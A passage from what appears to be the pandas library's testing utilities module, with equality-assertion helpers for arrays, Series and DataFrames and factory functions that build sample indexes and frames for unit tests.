left_base = _get_base(left)
right_base = _get_base(right)
if check_same == "same":
if left_base is not right_base:
raise AssertionError(f"{repr(left_base)} is not {repr(right_base)}")
elif check_same == "copy":
if left_base is right_base:
raise AssertionError(f"{repr(left_base)} is {repr(right_base)}")
def _raise(left, right, err_msg):
if err_msg is None:
if left.shape != right.shape:
raise_assert_detail(
obj, f"{obj} shapes are different", left.shape, right.shape
)
diff = 0
for l, r in zip(left, right):
# count up differences
if not array_equivalent(l, r, strict_nan=strict_nan):
diff += 1
diff = diff * 100.0 / left.size
msg = f"{obj} values are different ({np.round(diff, 5)} %)"
raise_assert_detail(obj, msg, left, right, index_values=index_values)
raise AssertionError(err_msg)
# compare shape and values
if not array_equivalent(left, right, strict_nan=strict_nan):
_raise(left, right, err_msg)
if check_dtype:
if isinstance(left, np.ndarray) and isinstance(right, np.ndarray):
assert_attr_equal("dtype", left, right, obj=obj)
def assert_extension_array_equal(
left,
right,
check_dtype=True,
index_values=None,
check_less_precise=no_default,
check_exact=False,
rtol: float = 1.0e-5,
atol: float = 1.0e-8,
):
"""
Check that left and right ExtensionArrays are equal.
Parameters
----------
left, right : ExtensionArray
The two arrays to compare.
check_dtype : bool, default True
Whether to check if the ExtensionArray dtypes are identical.
index_values : numpy.ndarray, default None
Optional index (shared by both left and right), used in output.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
.. deprecated:: 1.1.0
Use `rtol` and `atol` instead to define relative/absolute
tolerance, respectively. Similar to :func:`math.isclose`.
check_exact : bool, default False
Whether to compare number exactly.
rtol : float, default 1e-5
Relative tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
atol : float, default 1e-8
Absolute tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
Notes
-----
Missing values are checked separately from valid values.
A mask of missing values is computed for each and checked to match.
The remaining all-valid values are cast to object dtype and checked.
"""
if check_less_precise is not no_default:
warnings.warn(
"The 'check_less_precise' keyword in testing.assert_*_equal "
"is deprecated and will be removed in a future version. "
"You can stop passing 'check_less_precise' to silence this warning.",
FutureWarning,
stacklevel=2,
)
rtol = atol = _get_tol_from_less_precise(check_less_precise)
assert isinstance(left, ExtensionArray), "left is not an ExtensionArray"
assert isinstance(right, ExtensionArray), "right is not an ExtensionArray"
if check_dtype:
assert_attr_equal("dtype", left, right, obj="ExtensionArray")
if (
isinstance(left, DatetimeLikeArrayMixin)
and isinstance(right, DatetimeLikeArrayMixin)
and type(right) == type(left)
):
# Avoid slow object-dtype comparisons
# np.asarray for case where we have a np.MaskedArray
assert_numpy_array_equal(
np.asarray(left.asi8), np.asarray(right.asi8), index_values=index_values
)
return
left_na = np.asarray(left.isna())
right_na = np.asarray(right.isna())
assert_numpy_array_equal(
left_na, right_na, obj="ExtensionArray NA mask", index_values=index_values
)
left_valid = np.asarray(left[~left_na].astype(object))
right_valid = np.asarray(right[~right_na].astype(object))
if check_exact:
assert_numpy_array_equal(
left_valid, right_valid, obj="ExtensionArray", index_values=index_values
)
else:
_testing.assert_almost_equal(
left_valid,
right_valid,
check_dtype=check_dtype,
rtol=rtol,
atol=atol,
obj="ExtensionArray",
index_values=index_values,
)
# This could be refactored to use the NDFrame.equals method
def assert_series_equal(
left,
right,
check_dtype=True,
check_index_type="equiv",
check_series_type=True,
check_less_precise=no_default,
check_names=True,
check_exact=False,
check_datetimelike_compat=False,
check_categorical=True,
check_category_order=True,
check_freq=True,
check_flags=True,
rtol=1.0e-5,
atol=1.0e-8,
obj="Series",
):
"""
Check that left and right Series are equal.
Parameters
----------
left : Series
right : Series
check_dtype : bool, default True
Whether to check the Series dtype is identical.
check_index_type : bool or {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical.
check_series_type : bool, default True
Whether to check the Series class is identical.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
When comparing two numbers, if the first number has magnitude less
than 1e-5, we compare the two numbers directly and check whether
they are equivalent within the specified precision. Otherwise, we
compare the **ratio** of the second number to the first number and
check whether it is equivalent to 1 within the specified precision.
.. deprecated:: 1.1.0
Use `rtol` and `atol` instead to define relative/absolute
tolerance, respectively. Similar to :func:`math.isclose`.
check_names : bool, default True
Whether to check the Series and Index names attribute.
check_exact : bool, default False
Whether to compare number exactly.
check_datetimelike_compat : bool, default False
Compare datetime-like which is comparable ignoring dtype.
check_categorical : bool, default True
Whether to compare internal Categorical exactly.
check_category_order : bool, default True
Whether to compare category order of internal Categoricals.
.. versionadded:: 1.0.2
check_freq : bool, default True
Whether to check the `freq` attribute on a DatetimeIndex or TimedeltaIndex.
check_flags : bool, default True
Whether to check the `flags` attribute.
.. versionadded:: 1.2.0
rtol : float, default 1e-5
Relative tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
atol : float, default 1e-8
Absolute tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
obj : str, default 'Series'
Specify object name being compared, internally used to show appropriate
assertion message.
"""
__tracebackhide__ = True
if check_less_precise is not no_default:
warnings.warn(
"The 'check_less_precise' keyword in testing.assert_*_equal "
"is deprecated and will be removed in a future version. "
"You can stop passing 'check_less_precise' to silence this warning.",
FutureWarning,
stacklevel=2,
)
rtol = atol = _get_tol_from_less_precise(check_less_precise)
# instance validation
_check_isinstance(left, right, Series)
if check_series_type:
assert_class_equal(left, right, obj=obj)
# length comparison
if len(left) != len(right):
msg1 = f"{len(left)}, {left.index}"
msg2 = f"{len(right)}, {right.index}"
raise_assert_detail(obj, "Series length are different", msg1, msg2)
if check_flags:
assert left.flags == right.flags, f"{repr(left.flags)} != {repr(right.flags)}"
# index comparison
assert_index_equal(
left.index,
right.index,
exact=check_index_type,
check_names=check_names,
check_exact=check_exact,
check_categorical=check_categorical,
rtol=rtol,
atol=atol,
obj=f"{obj}.index",
)
if check_freq and isinstance(left.index, (pd.DatetimeIndex, pd.TimedeltaIndex)):
lidx = left.index
ridx = right.index
assert lidx.freq == ridx.freq, (lidx.freq, ridx.freq)
if check_dtype:
# We want to skip exact dtype checking when `check_categorical`
# is False. We'll still raise if only one is a `Categorical`,
# regardless of `check_categorical`
if (
is_categorical_dtype(left.dtype)
and is_categorical_dtype(right.dtype)
and not check_categorical
):
pass
else:
assert_attr_equal("dtype", left, right, obj=f"Attributes of {obj}")
if check_exact and is_numeric_dtype(left.dtype) and is_numeric_dtype(right.dtype):
# Only check exact if dtype is numeric
assert_numpy_array_equal(
left._values,
right._values,
check_dtype=check_dtype,
obj=str(obj),
index_values=np.asarray(left.index),
)
elif check_datetimelike_compat and (
needs_i8_conversion(left.dtype) or needs_i8_conversion(right.dtype)
):
# we want to check only if we have compat dtypes
# e.g. integer and M|m are NOT compat, but we can simply check
# the values in that case
# datetimelike may have different objects (e.g. datetime.datetime
# vs Timestamp) but will compare equal
if not Index(left._values).equals(Index(right._values)):
msg = (
f"[datetimelike_compat=True] {left._values} "
f"is not equal to {right._values}."
)
raise AssertionError(msg)
elif is_interval_dtype(left.dtype) and is_interval_dtype(right.dtype):
assert_interval_array_equal(left.array, right.array)
elif is_categorical_dtype(left.dtype) or is_categorical_dtype(right.dtype):
_testing.assert_almost_equal(
left._values,
right._values,
rtol=rtol,
atol=atol,
check_dtype=check_dtype,
obj=str(obj),
index_values=np.asarray(left.index),
)
elif is_extension_array_dtype(left.dtype) and is_extension_array_dtype(right.dtype):
assert_extension_array_equal(
left._values,
right._values,
check_dtype=check_dtype,
index_values=np.asarray(left.index),
)
elif needs_i8_conversion(left.dtype) or needs_i8_conversion(right.dtype):
# DatetimeArray or TimedeltaArray
assert_extension_array_equal(
left._values,
right._values,
check_dtype=check_dtype,
index_values=np.asarray(left.index),
)
else:
_testing.assert_almost_equal(
left._values,
right._values,
rtol=rtol,
atol=atol,
check_dtype=check_dtype,
obj=str(obj),
index_values=np.asarray(left.index),
)
# metadata comparison
if check_names:
assert_attr_equal("name", left, right, obj=obj)
if check_categorical:
if is_categorical_dtype(left.dtype) or is_categorical_dtype(right.dtype):
assert_categorical_equal(
left._values,
right._values,
obj=f"{obj} category",
check_category_order=check_category_order,
)
# This could be refactored to use the NDFrame.equals method
def assert_frame_equal(
left,
right,
check_dtype=True,
check_index_type="equiv",
check_column_type="equiv",
check_frame_type=True,
check_less_precise=no_default,
check_names=True,
by_blocks=False,
check_exact=False,
check_datetimelike_compat=False,
check_categorical=True,
check_like=False,
check_freq=True,
check_flags=True,
rtol=1.0e-5,
atol=1.0e-8,
obj="DataFrame",
):
"""
Check that left and right DataFrame are equal.
This function is intended to compare two DataFrames and output any
differences. Is is mostly intended for use in unit tests.
Additional parameters allow varying the strictness of the
equality checks performed.
Parameters
----------
left : DataFrame
First DataFrame to compare.
right : DataFrame
Second DataFrame to compare.
check_dtype : bool, default True
Whether to check the DataFrame dtype is identical.
check_index_type : bool or {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical.
check_column_type : bool or {'equiv'}, default 'equiv'
Whether to check the columns class, dtype and inferred_type
are identical. Is passed as the ``exact`` argument of
:func:`assert_index_equal`.
check_frame_type : bool, default True
Whether to check the DataFrame class is identical.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
When comparing two numbers, if the first number has magnitude less
than 1e-5, we compare the two numbers directly and check whether
they are equivalent within the specified precision. Otherwise, we
compare the **ratio** of the second number to the first number and
check whether it is equivalent to 1 within the specified precision.
.. deprecated:: 1.1.0
Use `rtol` and `atol` instead to define relative/absolute
tolerance, respectively. Similar to :func:`math.isclose`.
check_names : bool, default True
Whether to check that the `names` attribute for both the `index`
and `column` attributes of the DataFrame is identical.
by_blocks : bool, default False
Specify how to compare internal data. If False, compare by columns.
If True, compare by blocks.
check_exact : bool, default False
Whether to compare number exactly.
check_datetimelike_compat : bool, default False
Compare datetime-like which is comparable ignoring dtype.
check_categorical : bool, default True
Whether to compare internal Categorical exactly.
check_like : bool, default False
If True, ignore the order of index & columns.
Note: index labels must match their respective rows
(same as in columns) - same labels must be with the same data.
check_freq : bool, default True
Whether to check the `freq` attribute on a DatetimeIndex or TimedeltaIndex.
check_flags : bool, default True
Whether to check the `flags` attribute.
rtol : float, default 1e-5
Relative tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
atol : float, default 1e-8
Absolute tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
obj : str, default 'DataFrame'
Specify object name being compared, internally used to show appropriate
assertion message.
See Also
--------
assert_series_equal : Equivalent method for asserting Series equality.
DataFrame.equals : Check DataFrame equality.
Examples
--------
This example shows comparing two DataFrames that are equal
but with columns of differing dtypes.
>>> from pandas._testing import assert_frame_equal
>>> df1 = pd.DataFrame({'a': [1, 2], 'b': [3, 4]})
>>> df2 = pd.DataFrame({'a': [1, 2], 'b': [3.0, 4.0]})
df1 equals itself.
>>> assert_frame_equal(df1, df1)
df1 differs from df2 as column 'b' is of a different type.
>>> assert_frame_equal(df1, df2)
Traceback (most recent call last):
...
AssertionError: Attributes of DataFrame.iloc[:, 1] (column name="b") are different
Attribute "dtype" are different
[left]: int64
[right]: float64
Ignore differing dtypes in columns with check_dtype.
>>> assert_frame_equal(df1, df2, check_dtype=False)
"""
__tracebackhide__ = True
if check_less_precise is not no_default:
warnings.warn(
"The 'check_less_precise' keyword in testing.assert_*_equal "
"is deprecated and will be removed in a future version. "
"You can stop passing 'check_less_precise' to silence this warning.",
FutureWarning,
stacklevel=2,
)
rtol = atol = _get_tol_from_less_precise(check_less_precise)
# instance validation
_check_isinstance(left, right, DataFrame)
if check_frame_type:
assert isinstance(left, type(right))
# assert_class_equal(left, right, obj=obj)
# shape comparison
if left.shape != right.shape:
raise_assert_detail(
obj, f"{obj} shape mismatch", f"{repr(left.shape)}", f"{repr(right.shape)}"
)
if check_flags:
assert left.flags == right.flags, f"{repr(left.flags)} != {repr(right.flags)}"
# index comparison
assert_index_equal(
left.index,
right.index,
exact=check_index_type,
check_names=check_names,
check_exact=check_exact,
check_categorical=check_categorical,
check_order=not check_like,
rtol=rtol,
atol=atol,
obj=f"{obj}.index",
)
# column comparison
assert_index_equal(
left.columns,
right.columns,
exact=check_column_type,
check_names=check_names,
check_exact=check_exact,
check_categorical=check_categorical,
check_order=not check_like,
rtol=rtol,
atol=atol,
obj=f"{obj}.columns",
)
if check_like:
left, right = left.reindex_like(right), right
# compare by blocks
if by_blocks:
rblocks = right._to_dict_of_blocks()
lblocks = left._to_dict_of_blocks()
for dtype in list(set(list(lblocks.keys()) + list(rblocks.keys()))):
assert dtype in lblocks
assert dtype in rblocks
assert_frame_equal(
lblocks[dtype], rblocks[dtype], check_dtype=check_dtype, obj=obj
)
# compare by columns
else:
for i, col in enumerate(left.columns):
assert col in right
lcol = left.iloc[:, i]
rcol = right.iloc[:, i]
assert_series_equal(
lcol,
rcol,
check_dtype=check_dtype,
check_index_type=check_index_type,
check_exact=check_exact,
check_names=check_names,
check_datetimelike_compat=check_datetimelike_compat,
check_categorical=check_categorical,
check_freq=check_freq,
obj=f'{obj}.iloc[:, {i}] (column name="{col}")',
rtol=rtol,
atol=atol,
)
def assert_equal(left, right, **kwargs):
"""
Wrapper for tm.assert_*_equal to dispatch to the appropriate test function.
Parameters
----------
left, right : Index, Series, DataFrame, ExtensionArray, or np.ndarray
The two items to be compared.
**kwargs
All keyword arguments are passed through to the underlying assert method.
"""
__tracebackhide__ = True
if isinstance(left, pd.Index):
assert_index_equal(left, right, **kwargs)
if isinstance(left, (pd.DatetimeIndex, pd.TimedeltaIndex)):
assert left.freq == right.freq, (left.freq, right.freq)
elif isinstance(left, pd.Series):
assert_series_equal(left, right, **kwargs)
elif isinstance(left, pd.DataFrame):
assert_frame_equal(left, right, **kwargs)
elif isinstance(left, IntervalArray):
assert_interval_array_equal(left, right, **kwargs)
elif isinstance(left, PeriodArray):
assert_period_array_equal(left, right, **kwargs)
elif isinstance(left, DatetimeArray):
assert_datetime_array_equal(left, right, **kwargs)
elif isinstance(left, TimedeltaArray):
assert_timedelta_array_equal(left, right, **kwargs)
elif isinstance(left, ExtensionArray):
assert_extension_array_equal(left, right, **kwargs)
elif isinstance(left, np.ndarray):
assert_numpy_array_equal(left, right, **kwargs)
elif isinstance(left, str):
assert kwargs == {}
assert left == right
else:
raise NotImplementedError(type(left))
def box_expected(expected, box_cls, transpose=True):
"""
Helper function to wrap the expected output of a test in a given box_class.
Parameters
----------
expected : np.ndarray, Index, Series
box_cls : {Index, Series, DataFrame}
Returns
-------
subclass of box_cls
"""
if box_cls is pd.array:
expected = pd.array(expected)
elif box_cls is pd.Index:
expected = pd.Index(expected)
elif box_cls is pd.Series:
expected = pd.Series(expected)
elif box_cls is pd.DataFrame:
expected = pd.Series(expected).to_frame()
if transpose:
# for vector operations, we we need a DataFrame to be a single-row,
# not a single-column, in order to operate against non-DataFrame
# vectors of the same length.
expected = expected.T
elif box_cls is PeriodArray:
# the PeriodArray constructor is not as flexible as period_array
expected = period_array(expected)
elif box_cls is DatetimeArray:
expected = DatetimeArray(expected)
elif box_cls is TimedeltaArray:
expected = TimedeltaArray(expected)
elif box_cls is np.ndarray:
expected = np.array(expected)
elif box_cls is to_array:
expected = to_array(expected)
else:
raise NotImplementedError(box_cls)
return expected
def to_array(obj):
# temporary implementation until we get pd.array in place
dtype = getattr(obj, "dtype", None)
if is_period_dtype(dtype):
return period_array(obj)
elif is_datetime64_dtype(dtype) or is_datetime64tz_dtype(dtype):
return DatetimeArray._from_sequence(obj)
elif is_timedelta64_dtype(dtype):
return TimedeltaArray._from_sequence(obj)
else:
return np.array(obj)
# -----------------------------------------------------------------------------
# Sparse
def assert_sp_array_equal(left, right):
"""
Check that the left and right SparseArray are equal.
Parameters
----------
left : SparseArray
right : SparseArray
"""
_check_isinstance(left, right, pd.arrays.SparseArray)
assert_numpy_array_equal(left.sp_values, right.sp_values)
# SparseIndex comparison
assert isinstance(left.sp_index, pd._libs.sparse.SparseIndex)
assert isinstance(right.sp_index, pd._libs.sparse.SparseIndex)
left_index = left.sp_index
right_index = right.sp_index
if not left_index.equals(right_index):
raise_assert_detail(
"SparseArray.index", "index are not equal", left_index, right_index
)
else:
# Just ensure a
pass
assert_attr_equal("fill_value", left, right)
assert_attr_equal("dtype", left, right)
assert_numpy_array_equal(left.to_dense(), right.to_dense())
# -----------------------------------------------------------------------------
# Others
def assert_contains_all(iterable, dic):
for k in iterable:
assert k in dic, f"Did not contain item: {repr(k)}"
def assert_copy(iter1, iter2, **eql_kwargs):
"""
iter1, iter2: iterables that produce elements
comparable with assert_almost_equal
Checks that the elements are equal, but not
the same object. (Does not check that items
in sequences are also not the same object)
"""
for elem1, elem2 in zip(iter1, iter2):
assert_almost_equal(elem1, elem2, **eql_kwargs)
msg = (
f"Expected object {repr(type(elem1))} and object {repr(type(elem2))} to be "
"different objects, but they were the same object."
)
assert elem1 is not elem2, msg
def getCols(k):
return string.ascii_uppercase[:k]
# make index
def makeStringIndex(k=10, name=None):
return Index(rands_array(nchars=10, size=k), name=name)
def makeUnicodeIndex(k=10, name=None):
return Index(randu_array(nchars=10, size=k), name=name)
def makeCategoricalIndex(k=10, n=3, name=None, **kwargs):
""" make a length k index or n categories """
x = rands_array(nchars=4, size=n)
return CategoricalIndex(
Categorical.from_codes(np.arange(k) % n, categories=x), name=name, **kwargs
)
def makeIntervalIndex(k=10, name=None, **kwargs):
""" make a length k IntervalIndex """
x = np.linspace(0, 100, num=(k + 1))
return IntervalIndex.from_breaks(x, name=name, **kwargs)
def makeBoolIndex(k=10, name=None):
if k == 1:
return Index([True], name=name)
elif k == 2:
return Index([False, True], name=name)
return Index([False, True] + [False] * (k - 2), name=name)
def makeIntIndex(k=10, name=None):
return Index(list(range(k)), name=name)
def makeUIntIndex(k=10, name=None):
return Index([2 ** 63 + i for i in range(k)], name=name)
def makeRangeIndex(k=10, name=None, **kwargs):
return RangeIndex(0, k, 1, name=name, **kwargs)
def makeFloatIndex(k=10, name=None):
values = sorted(np.random.random_sample(k)) - np.random.random_sample(1)
return Index(values * (10 ** np.random.randint(0, 9)), name=name)
def makeDateIndex(k=10, freq="B", name=None, **kwargs):
dt = datetime(2000, 1, 1)
dr = bdate_range(dt, periods=k, freq=freq, name=name)
return DatetimeIndex(dr, name=name, **kwargs)
def makeTimedeltaIndex(k=10, freq="D", name=None, **kwargs):
return pd.timedelta_range(start="1 day", periods=k, freq=freq, name=name, **kwargs)
def makePeriodIndex(k=10, name=None, **kwargs):
dt = datetime(2000, 1, 1)
return pd.period_range(start=dt, periods=k, freq="B", name=name, **kwargs)
def makeMultiIndex(k=10, names=None, **kwargs):
return MultiIndex.from_product((("foo", "bar"), (1, 2)), names=names, **kwargs)
_names = [
"Alice",
"Bob",
"Charlie",
"Dan",
"Edith",
"Frank",
"George",
"Hannah",
"Ingrid",
"Jerry",
"Kevin",
"Laura",
"Michael",
"Norbert",
"Oliver",
"Patricia",
"Quinn",
"Ray",
"Sarah",
"Tim",
"Ursula",
"Victor",
"Wendy",
"Xavier",
"Yvonne",
"Zelda",
]
def _make_timeseries(start="2000-01-01", end="2000-12-31", freq="1D", seed=None):
"""
Make a DataFrame with a DatetimeIndex
Parameters
----------
start : str or Timestamp, default "2000-01-01"
The start of the index. Passed to date_range with `freq`.
end : str or Timestamp, default "2000-12-31"
The end of the index. Passed to date_range with `freq`.
freq : str or Freq
The frequency to use for the DatetimeIndex
seed : int, optional
The random state seed.
* name : object dtype with string names
* id : int dtype with
* x, y : float dtype
Examples
--------
>>> _make_timeseries()
id name x y
timestamp
2000-01-01 982 Frank 0.031261 0.986727
2000-01-02 1025 Edith -0.086358 -0.032920
2000-01-03 982 Edith 0.473177 0.298654
2000-01-04 1009 Sarah 0.534344 -0.750377
2000-01-05 963 Zelda -0.271573 0.054424
... ... ... ... ...
2000-12-27 980 Ingrid -0.132333 -0.422195
2000-12-28 972 Frank -0.376007 -0.298687
2000-12-29 1009 Ursula -0.865047 -0.503133
2000-12-30 1000 Hannah -0.063757 -0.507336
2000-12-31 972 Tim -0.869120 0.531685
"""
index = pd.date_range(start=start, end=end, freq=freq, name="timestamp")
n = len(index)
state = np.random.RandomState(seed)
columns = {
"name": state.choice(_names, size=n),
"id": state.poisson(1000, size=n),
"x": state.rand(n) * 2 - 1,
"y": state.rand(n) * 2 - 1,
}
df = pd.DataFrame(columns, index=index, columns=sorted(columns))
if df.index[-1] == end:
df = df.iloc[:-1]
return df
def index_subclass_makers_generator():
make_index_funcs = [
makeDateIndex,
makePeriodIndex,
makeTimedeltaIndex,
makeRangeIndex,
makeIntervalIndex,
makeCategoricalIndex,
makeMultiIndex,
]
yield from make_index_funcs
def all_timeseries_index_generator(k=10):
"""
Generator which can be iterated over to get instances of all the classes
which represent time-series.
Parameters
----------
k: length of each of the index instances
"""
make_index_funcs = [makeDateIndex, makePeriodIndex, makeTimedeltaIndex]
for make_index_func in make_index_funcs:
yield make_index_func(k=k)
# make series
def makeFloatSeries(name=None):
index = makeStringIndex(_N)
return Series(randn(_N), index=index, name=name)
def makeStringSeries(name=None):
index = makeStringIndex(_N)
return Series(randn(_N), index=index, name=name)
def makeObjectSeries(name=None):
data = makeStringIndex(_N)
data = Index(data, dtype=object)
index = makeStringIndex(_N)
return Series(data, index=index, name=name)
def getSeriesData():
index = makeStringIndex(_N)
return {c: Series(randn(_N), index=index) for c in getCols(_K)}
def makeTimeSeries(nper=None, freq="B", name=None):
if nper is None:
nper = _N
return Series(randn(nper), index=makeDateIndex(nper, freq=freq), name=name)
def makePeriodSeries(nper=None, name=None):
if nper is None:
nper = _N
return Series(randn(nper), index=makePeriodIndex(nper), name=name)
def getTimeSeriesData(nper=None, freq="B"):
return {c: makeTimeSeries(nper, freq) for c in getCols(_K)}
def getPeriodData(nper=None):
return {c: makePeriodSeries(nper) for c in getCols(_K)}
# make frame
def makeTimeDataFrame(nper=None, freq="B"):
data = getTimeSeriesData(nper, freq)
return DataFrame(data)
def makeDataFrame():
data = getSeriesData()
return DataFrame(data)
def getMixedTypeDict():
index = Index(["a", "b", "c", "d", "e"])
data = {
"A": [0.0, 1.0, 2.0, 3.0, 4.0],
"B": [0.0, 1.0, 0.0, 1.0, 0.0],
"C": ["foo1", "foo2", "foo3", "foo4", "foo5"],
"D": bdate_range("1/1/2009", periods=5),
}
return index, data
def makeMixedDataFrame():
return DataFrame(getMixedTypeDict()[1])
def makePeriodFrame(nper=None):
data = getPeriodData(nper)
return DataFrame(data)
def makeCustomIndex(
nentries, nlevels, prefix="#", names=False, ndupe_l=None, idx_type=None
):
"""
Create an index/multindex with given dimensions, levels, names, etc'
nentries - number of entries in index
nlevels - number of levels (> 1 produces multindex)
prefix - a string prefix for labels
names - (Optional), bool or list of strings. if True will use default
names, if false will use no names, if a list is given, the name of
each level in the index will be taken from the list.
ndupe_l - (Optional), list of ints, the number of rows for which the
label will repeated at the corresponding level, you can specify just
the first few, the rest will use the default ndupe_l of 1.
len(ndupe_l) <= nlevels.
idx_type - "i"/"f"/"s"/"u"/"dt"/"p"/"td".
If idx_type is not None, `idx_nlevels` must be 1.
"i"/"f" creates an integer/float index,
"s"/"u" creates a string/unicode index
"dt" create a datetime index.
"td" create a datetime index.
if unspecified, string labels will be generated.
"""
if ndupe_l is None:
ndupe_l = [1] * nlevels
assert is_sequence(ndupe_l) and len(ndupe_l) <= nlevels
assert names is None or names is False or names is True or len(names) is nlevels
assert idx_type is None or (
idx_type in ("i", "f", "s", "u", "dt", "p", "td") and nlevels == 1
)
if names is True:
# build default names
names = [prefix + str(i) for i in range(nlevels)]
if names is False:
# pass None to index constructor for no name
names = None
# make singleton case uniform
if isinstance(names, str) and nlevels == 1:
names = [names]
# specific 1D index type requested?
idx_func = dict(
i=makeIntIndex,
f=makeFloatIndex,
s=makeStringIndex,
u=makeUnicodeIndex,
dt=makeDateIndex,
td=makeTimedeltaIndex,
p=makePeriodIndex,
).get(idx_type)
if idx_func:
idx = idx_func(nentries)
# but we need to fill in the name
if names:
idx.name = names[0]
return idx
elif idx_type is not None:
raise ValueError(
f"{repr(idx_type)} is not a legal value for `idx_type`, "
"use 'i'/'f'/'s'/'u'/'dt'/'p'/'td'."
)
if len(ndupe_l) < nlevels:
ndupe_l.extend([1] * (nlevels - len(ndupe_l)))
assert len(ndupe_l) == nlevels
assert all(x > 0 for x in ndupe_l)
tuples = []
for i in range(nlevels):
def keyfunc(x):
import re
numeric_tuple = re.sub(r"[^\d_]_?", "", x).split("_")
return [int(num) for num in numeric_tuple]
# build a list of lists to create the index from
div_factor = nentries // ndupe_l[i] + 1
cnt = Counter()
for j in range(div_factor):
label = f"{prefix}_l{i}_g{j}"
cnt[label] = ndupe_l[i]
# cute Counter trick
result = sorted(cnt.elements(), key=keyfunc)[:nentries]
tuples.append(result)
tuples = list(zip(*tuples))
# convert tuples to index
if nentries == 1:
# we have a single level of tuples, i.e. a regular Index
index = Index(tuples[0], name=names[0])
elif nlevels == 1:
name = None if names is None else names[0]
index = Index((x[0] for x in tuples), name=name)
else:
index = MultiIndex.from_tuples(tuples, names=names)
return index
def makeCustomDataframe(
nrows,
ncols,
c_idx_names=True,
r_idx_names=True,
c_idx_nlevels=1,
r_idx_nlevels=1,
data_gen_f=None,
c_ndupe_l=None,
r_ndupe_l=None,
dtype=None,
c_idx_type=None,
r_idx_type=None,
):
"""
Create a DataFrame using supplied parameters.
Parameters
----------
nrows, ncols - number of data rows/cols
c_idx_names, idx_names - False/True/list of strings, yields No names ,
default names or uses the provided names for the levels of the
corresponding index. You can provide a single string when
c_idx_nlevels ==1.
c_idx_nlevels - number of levels in columns index. > 1 will yield MultiIndex
r_idx_nlevels - number of levels in rows index. > 1 will yield MultiIndex
data_gen_f - a function f(row,col) which return the data value
at that position, the default generator used yields values of the form
"RxCy" based on position.
c_ndupe_l, r_ndupe_l - list of integers, determines the number
of duplicates for each label at a given level of the corresponding
index. The default `None` value produces a multiplicity of 1 across
all levels, i.e. a unique index. Will accept a partial list of length
N < idx_nlevels, for just the first N levels. If ndupe doesn't divide
nrows/ncol, the last label might have lower multiplicity.
dtype - passed to the DataFrame constructor as is, in case you wish to
have more control in conjunction with a custom `data_gen_f`
r_idx_type, c_idx_type - "i"/"f"/"s"/"u"/"dt"/"td".
If idx_type is not None, `idx_nlevels` must be 1.
"i"/"f" creates an integer/float index,
"s"/"u" creates a string/unicode index
"dt" create a datetime index.
"td" create a timedelta index.
if unspecified, string labels will be generated.
Examples
--------
# 5 row, 3 columns, default names on both, single index on both axis
>> makeCustomDataframe(5,3)
# make the data a random int between 1 and 100
>> mkdf(5,3,data_gen_f=lambda r,c:randint(1,100))
# 2-level multiindex on rows with each label duplicated
# twice on first level, default names on both axis, single
# index on both axis
>> a=makeCustomDataframe(5,3,r_idx_nlevels=2,r_ndupe_l=[2])
# DatetimeIndex on row, index with unicode labels on columns
# no names on either axis
>> a=makeCustomDataframe(5,3,c_idx_names=False,r_idx_names=False,
r_idx_type="dt",c_idx_type="u")
# 4-level multindex on rows with names provided, 2-level multindex
# on columns with default labels and default names.
>> a=makeCustomDataframe(5,3,r_idx_nlevels=4,
r_idx_names=["FEE","FI","FO","FAM"],
c_idx_nlevels=2)
>> a=mkdf(5,3,r_idx_nlevels=2,c_idx_nlevels=4)
"""
assert c_idx_nlevels > 0
assert r_idx_nlevels > 0
assert r_idx_type is None or (
r_idx_type in ("i", "f", "s", "u", "dt", "p", "td") and r_idx_nlevels == 1
)
assert c_idx_type is None or (
c_idx_type in ("i", "f", "s", "u", "dt", "p", "td") and c_idx_nlevels == 1
)
columns = makeCustomIndex(
ncols,
nlevels=c_idx_nlevels,
prefix="C",
names=c_idx_names,
ndupe_l=c_ndupe_l,
idx_type=c_idx_type,
)
index = makeCustomIndex(
nrows,
nlevels=r_idx_nlevels,
prefix="R",
names=r_idx_names,
ndupe_l=r_ndupe_l,
idx_type=r_idx_type,
)
# by default, generate data based on location
if data_gen_f is None:
data_gen_f = lambda r, c: f"R{r}C{c}"
data = [[data_gen_f(r, c) for c in range(ncols)] for r in range(nrows)]
return DataFrame(data, index, columns, dtype=dtype)
def _create_missing_idx(nrows, ncols, density, random_state=None):
if random_state is None:
random_state = np.random
else:
random_state = np.random.RandomState(random_state)
# below is cribbed from scipy.sparse
size = int(np.round((1 - density) * nrows * ncols))
# generate a few more to ensure unique values
min_rows = 5
fac = 1.02
extra_size = min(size + min_rows, fac * size)
def _gen_unique_rand(rng, _extra_size):
ind = rng.rand(int(_extra_size))
return np.unique(np.floor(ind * nrows * ncols))[:size]
ind = _gen_unique_rand(random_state, extra_size)
while ind.size < size:
extra_size *= 1.05
ind = _gen_unique_rand(random_state, extra_size)
j = np.floor(ind * 1.0 / nrows).astype(int)
i = (ind - j * nrows).astype(int)
return i.tolist(), j.tolist()
def makeMissingDataframe(density=0.9, random_state=None):
df = makeDataFrame()
i, j = _create_missing_idx(*df.shape, density=density, random_state=random_state)
df.values[i, j] = np.nan
return df
def optional_args(decorator):
"""
allows a decorator to take optional positional and keyword arguments.
Assumes that taking a single, callable, positional argument means that
it is decorating a function, i.e. something like this::
@my_decorator
def function(): pass
Calls decorator with decorator(f, *args, **kwargs)
"""
@wraps(decorator)
def wrapper(*args, **kwargs):
def dec(f):
return decorator(f, *args, **kwargs)
is_decorating = not kwargs and len(args) == 1 and callable(args[0])
if is_decorating:
f = args[0]
args = []
return dec(f)
else:
return dec
return wrapper
# skip tests on exceptions with this message
_network_error_messages = (
# 'urlopen error timed out',
# 'timeout: timed out',
# 'socket.timeout: timed out',
"timed out",
"Server Hangup",
